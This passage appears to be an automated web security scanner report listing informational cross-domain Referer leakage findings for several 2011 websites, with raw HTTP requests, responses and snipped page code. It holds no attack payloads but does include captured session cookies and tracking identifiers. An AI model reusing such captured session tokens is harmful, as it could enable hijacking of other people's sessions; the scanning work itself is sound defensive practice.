http://www.eset.com/us/company/contact
http://www.eset.com/us/company/legal-notices
http://www.eset.com/us/company/privacy-policy
http://www.eset.com/us/download
http://www.eset.com/us/home
http://www.eset.com/us/partners
http://www.eset.com/us/partners/worldwide-partners
http://www.eset.com/us/rss
http://www.eset.com/us/sitemap
http://www.eset.com/us/store
http://www.eset.com/us/support
http://www.facebook.com/esetusa
http://www.twitter.com/eset
http://www.youtube.com/user/esetusa
https://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0
https://secure.eset.com/us/scripts/lib/s_code3.js
https://secure.eset.com/us/store/geoIpRedirect

Request

GET /s.nl?c=438708&sc=3&whence=&qtyadd=1&n=1&mboxSession=1303736347554-914602&ext=T&Submit.x=43&productId=1650&Submit.y=8 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=dYyfN1wHZN71TmqdTHVPc5rfpmdrpWWkqQGJBTWHYGvFy6PP4kwCF9spppQp2p6T1y9LcTBvdSVRJT4zdGg0FbSwpQwRl5vyB94JHShTwbxX21bQLM8ycnhGDnyFQxbh!-2139436563; NLVisitorId=rcHW8415AZeYvnmq; NLShopperId=rcHW8415AciYvvMS; NS_VER=2011.1.0; NLPromocode=438708_; promocode=

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:59:58 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 677005915:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 54139

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>

<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...
00&bgbutton=F2F4F6&bgrequiredfld=ffffff&font=Arial%2CHelvetica%2Csans-serif&size_site_content=10pt&size_site_title=10pt&size=1.0&nlinputstyles=T&NS_VER=2011.1.0&3'>
<script type="text/javascript" src="https://secure.eset.com/us/store/geoIpRedirect"></script>
...[SNIP]...
<div id="header_logo"><a href="http://www.eset.com/us"><img src="/c.438708/images/eset_logo.png" alt="ESET LLC">
...[SNIP]...
<li><a href="http://www.eset.com/us/partners/worldwide-partners" class="header_partners">United States</a>
...[SNIP]...
<li><a href="http://www.eset.com/us/company">About ESET</a>
...[SNIP]...
<li class="first_main_nav_item"><a href="http://www.eset.com/us/home">For Home</a>
...[SNIP]...
<li><a href="http://www.eset.com/us/business/products">For Business</a>
...[SNIP]...
<li><a href="http://www.eset.com/us/store" class="selected">Store</a>
...[SNIP]...
<li><a href="http://www.eset.com/us/download">Download</a>
...[SNIP]...
<li><a href="http://www.eset.com/us/support">Support</a>
...[SNIP]...
<li><a href="http://www.eset.com/us/partners">Partners</a>
...[SNIP]...
<li><a href="http://www.eset.com/us/rss"><span class="rss">
...[SNIP]...
<li><a href="http://www.eset.com/us/company/contact">Contact Us</a>
...[SNIP]...
<li><a href="http://www.eset.com/us/company/privacy-policy">Privacy</a>
...[SNIP]...
<li><a href="http://www.eset.com/us/company/legal-notices">Legal Notices</a>
...[SNIP]...
<li><a href="http://www.eset.com/us/sitemap">Sitemap</a>
...[SNIP]...
<div class="social-icons">
<a href="http://www.facebook.com/esetusa" onclick="window.open(this.href);return false;"><img src="/c.438708/images/social/facebook_icon.gif" alt="Visit ESET on Facebook"></a>
<a href="http://www.twitter.com/eset" onclick="window.open(this.href);return false;"><img src="/c.438708/images/social/twitter_icon.gif" alt="Follow ESET on Twitter"></a>
<a href="http://www.youtube.com/user/esetusa" onclick="window.open(this.href);return false;"><img src="/c.438708/images/social/youtube_icon.gif" alt="ESET YouTube Channel"></a>
<a href="http://www.eset.com/us/rss" onclick="window.open(this.href);return false;"><img src="/c.438708/images/social/rss_icon.gif" alt="Subscribe to ESET RSS feeds">
...[SNIP]...


<script type="text/javascript" src="https://secure.eset.com/us/scripts/lib/s_code3.js"></script>
...[SNIP]...
<div><img src="https://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt=""></div>
...[SNIP]...

22.43. http://storage.trafic.ro/js/trafic.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://storage.trafic.ro
Path:	/js/trafic.js

Issue detail

The page was loaded from a URL containing a query string:

http://storage.trafic.ro/js/trafic.js?tk=5090212859213352&t_rid=romarketgidcom

The response contains the following link to another domain:

http://www.trafic.ro/?rid='+t_rid+'

Request

GET /js/trafic.js?tk=5090212859213352&t_rid=romarketgidcom HTTP/1.1
Host: storage.trafic.ro
Proxy-Connection: keep-alive
Referer: http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trafic_ranking=6c7f4ecfdd8l1dc980fda3f00c3621d0

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 14:39:00 GMT
Server: Apache
Content-type: application/x-javascript
Expires: Thu, 11 Jan 1973 16:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:39:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="ALL IND DSP COR ADM CONo CUR IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Connection: close
Content-Length: 7673

function trfc$tfCxOy (){$tfCxPy = 0;$tfCyPy='';$tfCzPy=window;$tfCzPz=$tfCzPy.location;$tfCzPA=Math;$tfCzQA=String;$tfCzQB=$tfCzQA.fromCharCode;if($tfCzPz.protocol=='file:')return;$tfCzRB=navigator;$t
...[SNIP]...
ru site-urile romanesti';$tfQSaN.appendChild($tfPSaM);}$tfRSaN=document.getElementById("trfc_trafic_script");$tfRSaN.parentNode.insertBefore(88>1?$tfQSaN:$tfPSaM,$tfRSaN);} else {document.write((88>1?'<a href="http://www.trafic.ro/?rid='+t_rid+'" target=_blank>':'')+'<img src="'+$tfNS9M+'"'+' width="88" height="31"'+(88>
...[SNIP]...

22.44. http://tengrinews.kz/static/js/twitter.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tengrinews.kz
Path:	/static/js/twitter.js

Issue detail

The page was loaded from a URL containing a query string:

http://tengrinews.kz/static/js/twitter.js?1303741246

The response contains the following links to other domains:

http://twitter.com/$2
http://twitter.com/'+this.from_user+'
http://twitter.com/search?q=%23$2

Request

GET /static/js/twitter.js?1303741246 HTTP/1.1
Host: tengrinews.kz
Proxy-Connection: keep-alive
Referer: http://tengrinews.kz/tag/891/?_openstat=ZGlyZWN0LnlhbmRleC5ydTsxOTgyMjk5OzczMDAyNTU7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=2s711rqep5c965kp1duse9cev3; sess=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%229d0d0366c112938578e0493b8d3e9f0f%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29+Ap%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221303741246%22%3B%7Dff90da2a04be034fcd1d0a9e7c69a191

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 25 Apr 2011 14:36:51 GMT
Content-Type: application/javascript
Connection: keep-alive
Last-Modified: Thu, 21 Apr 2011 04:41:57 GMT
ETag: "be0c2-a23-4a1665c78cf40"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 2595

/* womtec.ru */

var tweetUsers = ['tengrinewskz','KarimMassimov', 'MedvedevRussia', 'BarackObama','AZhumagaliev', 'KremlinRussia'];
var buildString = "";

$(document).ready(function(){

   $('#t
...[SNIP]...
<div class="user"><a href="http://twitter.com/'+this.from_user+'" target="_blank">'+this.from_user+'</a>
...[SNIP]...
</a>');
   str = str.replace(/([^\w])\@([\w\-]+)/gm,'$1@<a href="http://twitter.com/$2" target="_blank">$2</a>');
   str = str.replace(/([^\w])\#([\w\-]+)/gm,'$1<a href="http://twitter.com/search?q=%23$2" target="_blank">#$2</a>
...[SNIP]...

22.45. http://tengrinews.kz/tag/891/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tengrinews.kz
Path:	/tag/891/

Issue detail

The page was loaded from a URL containing a query string:

http://tengrinews.kz/tag/891/?_openstat=ZGlyZWN0LnlhbmRleC5ydTsxOTgyMjk5OzczMDAyNTU7eWFuZGV4LnJ1Omd1YXJhbnRlZQ

The response contains the following links to other domains:

http://counter.rambler.ru/top100.cnt?2378577
http://counter.rambler.ru/top100.jcn?2378577
http://en.tengrinews.kz/
http://m.tengrinews.kz/
http://mc.yandex.ru/metrika/watch.js
http://mc.yandex.ru/watch/1838272
http://notamedia.ru/
http://orphus.ru/
http://tengrifm.kz/
http://top100.rambler.ru/navi/2378577/
http://www.facebook.com/profile.php?id=100001852320591&v=wall
http://zero.kz/?u=40613
http://zero.kz/c.php?u=40613
https://twitter.com/tengrinewskz

Request

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 25 Apr 2011 14:34:09 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.3-2
Set-Cookie: PHPSESSID=2kh13g87ng9vfofjh75vcvpsb3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: sess=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22992c6a53539ed93969b86244758fda88%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29+Ap%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221303742049%22%3B%7D214a8e57fbabe8f7012a7d490d65daa7; expires=Thu, 28-Apr-2011 14:34:09 GMT; path=/
Vary: Accept-Encoding
Content-Length: 32979

<!DOCTYPE html>
<html>
<head>
<title>Tengrinews.kz : .............. .................... .... ..............</title>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <meta
...[SNIP]...
<div class="lang">
                                                   <a href="http://m.tengrinews.kz/" class="mobile_version" title=".................. ............" target="_self"><img src="/static/i/m.gif" />
...[SNIP]...
</font>
                           <a href="http://en.tengrinews.kz/" title="English" target="_self">EN</a>
...[SNIP]...
<div class="radioFlash">
               <a href="http://tengrifm.kz" class="showTengriFm" target="_blank">
                   <img src="/static/images/radioFlash.png" alt="" class="png" />
...[SNIP]...
<li><a href="https://twitter.com/tengrinewskz" title="twitter" class="tw">twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/profile.php?id=100001852320591&v=wall" title="facebook" class="fb">facebook</a>
...[SNIP]...
</script>
       <a href="http://orphus.ru" id="orphus" target="_blank"><img alt=".............. Orphus" src="/static/js/orphus.gif" border="0" />
...[SNIP]...
<div class="creator"><a href="http://notamedia.ru/">........ ............ .. ................ Notamedia</a>
...[SNIP]...
<noscript>
<a href='http://zero.kz/?u=40613' target='_blank'>
<img src='http://zero.kz/c.php?u=40613' border='0px' width='88'
height='31' alt='CountZero' /></a>
...[SNIP]...

<script id="top100Counter" type="text/javascript" src="http://counter.rambler.ru/top100.jcn?2378577"></script>
<noscript>
<a href="http://top100.rambler.ru/navi/2378577/">
<img src="http://counter.rambler.ru/top100.cnt?2378577" alt="Rambler's Top100" border="0" />
</a>
...[SNIP]...

   <script src="http://mc.yandex.ru/metrika/watch.js" type="text/javascript"></script>
...[SNIP]...
<div style="position:absolute"><img src="http://mc.yandex.ru/watch/1838272" alt="" /></div>
...[SNIP]...

22.46. http://webalta.ru/news.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://webalta.ru
Path:	/news.html

Issue detail

The page was loaded from a URL containing a query string:

http://webalta.ru/news.html?14857

The response contains the following links to other domains:

http://auto.webalta.ru/
http://games.webalta.ru/
http://img.webalta.ru/newsImg/news_0.jpg?55718
http://img.webalta.ru/newsImg/news_1.jpg?55718
http://img.webalta.ru/newsImg/news_10.jpg?55718
http://img.webalta.ru/newsImg/news_11.jpg?55718
http://img.webalta.ru/newsImg/news_12.jpg?55718
http://img.webalta.ru/newsImg/news_13.jpg?55718
http://img.webalta.ru/newsImg/news_2.jpg?55718
http://img.webalta.ru/newsImg/news_3.jpg?55718
http://img.webalta.ru/newsImg/news_5.jpg?55718
http://img.webalta.ru/newsImg/news_6.jpg?55718
http://img.webalta.ru/newsImg/news_7.jpg?55718
http://img.webalta.ru/newsImg/news_8.jpg?55718
http://img.webalta.ru/newsImg/news_9.jpg?55718
http://img.webalta.ru/public/css/style.css
http://img.webalta.ru/public/images/logo200x80.png
http://img.webalta.ru/public/js/webalta.js
http://justanews.ru/general/10345451560/
http://justanews.ru/general/10457898583/
http://justanews.ru/general/11425643234/
http://justanews.ru/general/11478849322/
http://justanews.ru/general/12132715902/
http://justanews.ru/general/8111385468/
http://justanews.ru/general/8185753558/
http://justanews.ru/general/8272959774/
http://justanews.ru/general/8279317407/
http://justanews.ru/general/9144492183/
http://justanews.ru/general/9193279130/
http://justanews.ru/general/9412017149/
http://justanews.ru/general/9877594234/
http://kino.webalta.ru/
http://mc.yandex.ru/metrika/watch.js
http://mc.yandex.ru/watch/57617?cnt-class=1
http://my.webalta.ru/
http://pogoda.webalta.ru/

Request

GET /news.html?14857 HTTP/1.1
Host: webalta.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.2.10.1303741218; MG_id=7269; MG_type=news; MG_1001=1; pogoda_reg=10290

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:30:08 GMT
Server: Apache/1.3.42 (Unix)
Last-Modified: Mon, 25 Apr 2011 14:18:12 GMT
ETag: "5dba7-6471-4db582a4"
Accept-Ranges: bytes
Content-Length: 25713
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>.. .............
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

   <link rel="stylesheet" type="text/css" href="http://img.webalta.ru/public/css/style.css">
   

   <script language="JavaScript" type="text/javascript" src="http://img.webalta.ru/public/js/webalta.js"></script>
...[SNIP]...
</b>  <a href="http://auto.webalta.ru" target="_blank">........</a>  <a href="http://kino.webalta.ru" target="_blank">........</a><a href="http://pogoda.webalta.ru" target="_blank">............</a>  <a href="http://games.webalta.ru" target="_blank">........</a>
...[SNIP]...
<div class="floatR"><a href="http://my.webalta.ru/" target="_blank">...... ................</a>
...[SNIP]...
<a href="/"><img src="http://img.webalta.ru/public/images/logo200x80.png" width="200" height="80"></a>
...[SNIP]...
<br>
                       <a href='http://justanews.ru/general/10345451560/' target='_blank'><img id='newsID0_img' src="http://img.webalta.ru/newsImg/news_0.jpg?55718" width="100" height="100"></a>
                        <a id='newsID0_title' class="news-title" href='http://justanews.ru/general/10345451560/' target='_blank'>.. ........................ ................ .......... .................. ....................</a>
...[SNIP]...
<br>
                       <a id='newsID0_text' href="http://justanews.ru/general/10345451560/" target='_blank'>.. .............. .......... .. .......... ...... ........ .................... ........ .... ............ .................. - ................ .. 1493 ........ .. ................ ...................
...[SNIP]...
<br>
                       <a href='http://justanews.ru/general/11478849322/' target='_blank'><img id='newsID1_img' src="http://img.webalta.ru/newsImg/news_1.jpg?55718" width="100" height="100"></a>
                        <a id='newsID1_title' class="news-title" href='http://justanews.ru/general/11478849322/' target='_blank'>.... ........ .................. .......... ....................</a>
...[SNIP]...
<br>
                       <a id='newsID1_text' href="http://justanews.ru/general/11478849322/" target='_blank'>.. ........................ ................ .......... .................. .......... .........., .................... ................ Stars. .... ........ .... .............. .... ...................
...[SNIP]...
<br>
                       <a href='http://justanews.ru/general/8272959774/' target='_blank'><img id='newsID2_img' src="http://img.webalta.ru/newsImg/news_2.jpg?55718" width="100" height="100"></a>
                        <a id='newsID2_title' class="news-title" href='http://justanews.ru/general/8272959774/' target='_blank'>SpaceX .................. .............. .... ........ .......... 10-20 ......</a>
...[SNIP]...
<br>
                       <a id='newsID2_text' href="http://justanews.ru/general/8272959774/" target='_blank'>SpaceX ............................ ................ ................ .... ........ .. .................. 10-20 ....... .... ........ ............ ........................ ................ ........ ...
...[SNIP]...
<br>
                       <a href='http://justanews.ru/general/8111385468/' target='_blank'><img id='newsID3_img' src="http://img.webalta.ru/newsImg/news_3.jpg?55718" width="100" height="100"></a>
                        <a id='newsID3_title' class="news-title" href='http://justanews.ru/general/8111385468/' target='_blank'>.... .............. .............. .................. .............. .................................... ..........</a>
...[SNIP]...
<br>
                       <a id='newsID3_text' href="http://justanews.ru/general/8111385468/" target='_blank'>.. .................... ........................, ...................... ........................ ...... .. ......, .. ...................... ........ .................. ............ .............. ..
...[SNIP]...
<br>
                       <a href='http://justanews.ru/general/8279317407/' target='_blank'><img id='newsID5_img' src="http://img.webalta.ru/newsImg/news_5.jpg?55718" width="100" height="100"></a>
                        <a id='newsID5_title' class="news-title" href='http://justanews.ru/general/8279317407/' target='_blank'>............ .................. .... ..............</a>
...[SNIP]...
<br>
                       <a id='newsID5_text' href="http://justanews.ru/general/8279317407/" target='_blank'>.. .................... ................ .................. ............. .. ........................ .............., .................. .. ........................ .......... ...... .............. ...
...[SNIP]...
<br>
                       <a href='http://justanews.ru/general/9412017149/' target='_blank'><img id='newsID6_img' src="http://img.webalta.ru/newsImg/news_6.jpg?55718" width="100" height="100"></a>
                        <a id='newsID6_title' class="news-title" href='http://justanews.ru/general/9412017149/' target='_blank'>.......... ............ ...................... .............. ............ .. ............ .... ............ ....-2011</a>
...[SNIP]...
<br>
                       <a id='newsID6_text' href="http://justanews.ru/general/9412017149/" target='_blank'>.............. ............ .............. ............ .... ............ ................ .......... .................... .............., .............. .......... ........................ ...........
...[SNIP]...
<br>
                       <a href='http://justanews.ru/general/9144492183/' target='_blank'><img id='newsID7_img' src="http://img.webalta.ru/newsImg/news_7.jpg?55718" width="100" height="100"></a>
                        <a id='newsID7_title' class="news-title" href='http://justanews.ru/general/9144492183/' target='_blank'>............ .............. .......................... .. .............. ............</a>
...[SNIP]...
<br>
                       <a id='newsID7_text' href="http://justanews.ru/general/9144492183/" target='_blank'>.................... .......... ............................ .............. ...... ............ .............. .......... ...... .......... .................. .............. ............. .... ........
...[SNIP]...
<br>
                       <a href='http://justanews.ru/general/10457898583/' target='_blank'><img id='newsID8_img' src="http://img.webalta.ru/newsImg/news_8.jpg?55718" width="100" height="100"></a>
                        <a id='newsID8_title' class="news-title" href='http://justanews.ru/general/10457898583/' target='_blank'>.................. .................. .. ........ ....-.... .......... ......S....</a>
...[SNIP]...
<br>
                       <a id='newsID8_text' href="http://justanews.ru/general/10457898583/" target='_blank'>.................................. ................ Gala Records (................. ..............) ............ ...... .. ...... .................. .... ............ ...................... ...........
...[SNIP]...
<br>
                       <a href='http://justanews.ru/general/11425643234/' target='_blank'><img id='newsID9_img' src="http://img.webalta.ru/newsImg/news_9.jpg?55718" width="100" height="100"></a>
                        <a id='newsID9_title' class="news-title" href='http://justanews.ru/general/11425643234/' target='_blank'>.............. ...... ........ 12 ...... .... ................ ..................</a>
...[SNIP]...
<br>
                       <a id='newsID9_text' href="http://justanews.ru/general/11425643234/" target='_blank'>.................... ................ .............. ...... .................... .......................... ...... .............. .................... .. 12 .......... .............. .... .............
...[SNIP]...
<br>
                       <a href='http://justanews.ru/general/9193279130/' target='_blank'><img id='newsID10_img' src="http://img.webalta.ru/newsImg/news_10.jpg?55718" width="100" height="100"></a>
                        <a id='newsID10_title' class="news-title" href='http://justanews.ru/general/9193279130/' target='_blank'>............ ...................... .... ................</a>
...[SNIP]...
<br>
                       <a id='newsID10_text' href="http://justanews.ru/general/9193279130/" target='_blank'>.............................. ...... ................ ...................... .......................... .................., ........ .... ................ ........ ...... ........................ .. .
...[SNIP]...
<br>
                       <a href='http://justanews.ru/general/12132715902/' target='_blank'><img id='newsID11_img' src="http://img.webalta.ru/newsImg/news_11.jpg?55718" width="100" height="100"></a>
                        <a id='newsID11_title' class="news-title" href='http://justanews.ru/general/12132715902/' target='_blank'>Apple ............ ............ .............. ............ ............ ............ ..........</a>
...[SNIP]...
<br>
                       <a id='newsID11_text' href="http://justanews.ru/general/12132715902/" target='_blank'>............ .......... 15-.... ............ ........................ .......... ........ .................. .. .......... .......................... ................ ................ Apple, ..........
...[SNIP]...
<br>
                       <a href='http://justanews.ru/general/9877594234/' target='_blank'><img id='newsID12_img' src="http://img.webalta.ru/newsImg/news_12.jpg?55718" width="100" height="100"></a>
                        <a id='newsID12_title' class="news-title" href='http://justanews.ru/general/9877594234/' target='_blank'>................ .................. .. .......... ............ .......... ............................ ..........</a>
...[SNIP]...
<br>
                       <a id='newsID12_text' href="http://justanews.ru/general/9877594234/" target='_blank'>.................. ............ .............. ................ .... ................, ...... .......... .............................. .......... .............. .......... ...................... .. ..
...[SNIP]...
<br>
                       <a href='http://justanews.ru/general/8185753558/' target='_blank'><img id='newsID13_img' src="http://img.webalta.ru/newsImg/news_13.jpg?55718" width="100" height="100"></a>
                        <a id='newsID13_title' class="news-title" href='http://justanews.ru/general/8185753558/' target='_blank'>................ ........ ................ .............. .............. ............</a>
...[SNIP]...
<br>
                       <a id='newsID13_text' href="http://justanews.ru/general/8185753558/" target='_blank'>.................... ................ LoveFilm, .................................... .... .............. .............. .. ................, .............. .......... .. ................, .......... ..
...[SNIP]...

<script src="//mc.yandex.ru/metrika/watch.js" type="text/javascript"></script>
...[SNIP]...
<div style="position:absolute"><img src="//mc.yandex.ru/watch/57617?cnt-class=1" alt="" /></div>
...[SNIP]...

22.47. https://www.controlscan.com/checkout_invalid.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.controlscan.com
Path:	/checkout_invalid.php

Issue detail

The page was loaded from a URL containing a query string:

https://www.controlscan.com/checkout_invalid.php?pid=&reason=Card%20Number%20was%20not%20between%2013%20and%2016%20digits

The response contains the following links to other domains:

https://gw-services.vtrenz.net/WebCookies/iMAWebCookie.js?05B7F374-D914-47E4-8F04-8DF29390CEC9
https://s.analytics.yahoo.com/p.pl?a=1000725800122&js=no
https://s.yimg.com/mi/eu/ywa.js
https://seal.verisign.com/getseal?host_name=www.controlscan.com&size=M&use_flash=NO&use_transparent=NO&lang=en
https://server.livechatinc.net/licence/1004853/script.cgi?lang=en&groups=0

Request

GET /checkout_invalid.php?pid=&reason=Card%20Number%20was%20not%20between%2013%20and%2016%20digits HTTP/1.1
Host: www.controlscan.com
Connection: keep-alive
Referer: https://www.controlscan.com/checkout.php
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=00f4el4lcuvnop42qop34mkqh4; __utmz=180386997.1303732833.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fpc1000725800122=O1TwOju5|4ybarsbLaa|fses1000725800122=|4ybarsbLaa|O1TwOju5|fvis1000725800122=Zj1odHRwcyUzQSUyRiUyRnd3dy5jb250cm9sc2Nhbi5jb20lMkYmYj1Db250cm9sU2NhbiUyMFBDSSUyMENvbXBsaWFuY2UlMjAlN0MlMjBHZXQlMjBQQ0klMjBDb21wbGlhbnQlMjBUb2RheSE=|8MYMHMsoss|8MYMHMsoss|8MYMHMsoss|8|8MYMHMsoss|8MYMHMsoss; __utma=180386997.730761609.1303732833.1303732833.1303735963.2; __utmc=180386997; __utmb=180386997.3.10.1303735963; com.vtrenz.iMAWebCookie=49379056-69d2-6147-26ad-65d29c6189eb; com.vtrenz.iMA.session=3cd51bd8-477e-ec0e-65cc-8ca3a9c2b5ac

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:56:02 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="PHY DEM ONL STA PUR NAV COM OUR DELo CUR ADM DEV IDC COR BUS DSP"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26875

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

<script language="JavaScript" src="//server.livechatinc.net/licence/1004853/script.cgi?lang=en&groups=0" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.controlscan.com&size=M&use_flash=NO&use_transparent=NO&lang=en"></script>
...[SNIP]...

<script src="https://gw-services.vtrenz.net/WebCookies/iMAWebCookie.js?05B7F374-D914-47E4-8F04-8DF29390CEC9" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="https://s.yimg.com/mi/eu/ywa.js"></script>
...[SNIP]...
<div><img src="https://s.analytics.yahoo.com/p.pl?a=1000725800122&js=no" width="1" height="1" alt="" /></div>
...[SNIP]...

22.48. https://www.controlscan.com/shoppingcart.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.controlscan.com
Path:	/shoppingcart.php

Issue detail

The page was loaded from a URL containing a query string:

https://www.controlscan.com/shoppingcart.php?itemsadded=1

The response contains the following links to other domains:

https://gw-services.vtrenz.net/WebCookies/iMAWebCookie.js?05B7F374-D914-47E4-8F04-8DF29390CEC9
https://s.analytics.yahoo.com/p.pl?a=1000725800122&js=no
https://s.yimg.com/mi/eu/ywa.js
https://seal.verisign.com/getseal?host_name=www.controlscan.com&size=M&use_flash=NO&use_transparent=NO&lang=en
https://server.livechatinc.net/licence/1004853/script.cgi?lang=en&groups=0

Request

GET /shoppingcart.php?itemsadded=1 HTTP/1.1
Host: www.controlscan.com
Connection: keep-alive
Referer: https://www.controlscan.com/shoppingcart.php
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
